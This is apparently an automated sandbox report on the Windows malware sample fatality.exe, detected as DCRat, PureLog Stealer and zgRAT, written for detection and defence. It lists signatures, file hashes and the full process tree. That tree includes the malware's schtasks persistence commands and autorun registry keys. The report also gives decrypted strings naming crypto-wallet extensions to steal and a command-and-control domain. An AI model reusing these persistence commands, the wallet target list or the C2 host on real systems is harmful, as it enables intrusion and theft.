Windows Analysis Report
fatality.exe

Overview

General Information

Sample name: fatality.exe
Analysis ID: 1589980
MD5: a7040b85fc683f088f4c6e5b44052c43
SHA1: 7e3d644d1a1fb7b9bcccb6406d2e7fbd062eae66
SHA256: b786f31f1c89c71d0510bbd32510595d9891c67db516f968261b02594a423a8d
Tags: DCRat, exe, NyashTeam, user-MalHunter3

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fatality.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\fatality.exe" MD5: A7040B85FC683F088F4C6E5B44052C43)
    • wscript.exe (PID: 4140 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6204 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • containerReview.exe (PID: 6536 cmdline: "C:\blockcomSession/containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
          • schtasks.exe (PID: 2300 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1812 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3652 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 6448 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5536 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 3504 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 2300 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 1292 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6760 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6456 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5336 cmdline: schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2888 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2920 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2164 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6520 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 432 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2888 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 320 cmdline: schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6520 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6772 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 320 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 1476 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • containerReview.exe (PID: 7368 cmdline: "C:\Users\All Users\dbg\containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • mQBLhXIPAJ.exe (PID: 2172 cmdline: C:\blockcomSession\mQBLhXIPAJ.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
    • cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7464 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7480 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • mQBLhXIPAJ.exe (PID: 7600 cmdline: "C:\blockcomSession\mQBLhXIPAJ.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • mQBLhXIPAJ.exe (PID: 5624 cmdline: C:\blockcomSession\mQBLhXIPAJ.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • containerReview.exe (PID: 7200 cmdline: C:\blockcomSession\containerReview.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • containerReview.exe (PID: 7216 cmdline: C:\blockcomSession\containerReview.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • mQBLhXIPAJ.exe (PID: 7508 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • containerReview.exe (PID: 7696 cmdline: "C:\blockcomSession\containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
fatality.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
fatality.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\ProgramData\dbg\containerReview.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ProgramData\dbg\containerReview.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: containerReview.exe PID: 6536 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.fatality.exe.61276fb.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.fatality.exe.61276fb.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.fatality.exe.61236fb.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.fatality.exe.61236fb.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.fatality.exe.61236fb.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 3504, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Templates\mQBLhXIPAJ.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mQBLhXIPAJ
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mQBLhXIPAJ
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 6536, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", ProcessId: 6448, ProcessName: csc.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\fatality.exe", ParentImage: C:\Users\user\Desktop\fatality.exe, ParentProcessId: 6532, ParentProcessName: fatality.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , ProcessId: 4140, ProcessName: wscript.exe
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetFilename: C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline

                                    Data Obfuscation

                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 6536, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", ProcessId: 6448, ProcessName: csc.exe
                                    No Suricata rule has matched

                                    AV Detection

                                    Source: fatality.exeAvira: detected
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\Users\user\Desktop\RUDRugHQ.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\ProgramData\dbg\containerReview.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\jPEOVQoM.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Local\Temp\2BGdjLelXV.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\blockcomSession\containerReview.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\Users\user\Desktop\GgZbKUMi.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\HTJtRROP.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Source: C:\ProgramData\dbg\containerReview.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\Desktop\GgZbKUMi.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\HTJtRROP.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\LTranRbW.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\PRRjZxCV.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\RUDRugHQ.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\eTDxNkzS.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\jPEOVQoM.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\nCWNxMEA.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ucFnGTXv.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\yCQlabwB.logReversingLabs: Detection: 29%
                                    Source: C:\blockcomSession\containerReview.exeReversingLabs: Detection: 82%
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Source: fatality.exeVirustotal: Detection: 83%
                                    Source: fatality.exeReversingLabs: Detection: 71%
                                    Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RUDRugHQ.logJoe Sandbox ML: detected
                                    Source: C:\ProgramData\dbg\containerReview.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\nCWNxMEA.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\jPEOVQoM.logJoe Sandbox ML: detected
                                    Source: C:\blockcomSession\containerReview.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RLUzQxgL.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\VquIdqjl.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\yCQlabwB.logJoe Sandbox ML: detected
                                    Source: fatality.exeJoe Sandbox ML: detected
                                    Source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                                    Source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: fatality.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\d81cfa058c78b8
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\7-Zip\Lang\d81cfa058c78b8
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe, fatality.exe, 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEA69B FindFirstFileW,FindFirstFileW,0_2_00DEA69B
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: global trafficTCP traffic: 192.168.2.5:56338 -> 162.159.36.2:53
                                    Source: unknownDNS traffic detected: query: 373292cm.nyashka.top replaycode: Server failure (2)
                                    Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
